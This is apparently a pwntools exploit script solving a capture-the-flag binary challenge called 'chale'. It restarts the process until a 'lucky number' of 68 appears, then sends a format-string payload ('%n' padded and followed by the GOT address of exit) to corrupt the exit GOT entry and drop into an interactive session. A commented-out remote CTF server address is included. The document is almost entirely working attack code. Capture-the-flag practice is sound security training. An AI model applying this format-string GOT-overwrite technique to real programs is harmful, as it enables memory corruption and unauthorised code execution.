#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./chale")
# context.log_level='debug'
# p = remote("addr", 1337)
while True:
    # p = remote("152.69.210.130", 2004)
    p = process([exe.path])
    def gdbs():
        context.terminal = ["foot"]
        gdb.attach(p, gdbscript="""

                   """)
        # p = gdb.debug([exe.path],"""
        #
        #                 """)

    sla = lambda msg, data: p.sendlineafter(msg, data)
    sa = lambda msg, data: p.sendafter(msg, data)
    sl = lambda data: p.sendline(data)
    s = lambda data: p.send(data)
    p.recvuntil("Lucky number: ")
    lucky = int(p.recv(2))
    if lucky == 68:
        break


sla("Exit","+")
gdbs()
sla("name:",b"%n".ljust(0x60,b"\0")+p64(exe.got.exit))







p.interactive()
# good luck pwning :)

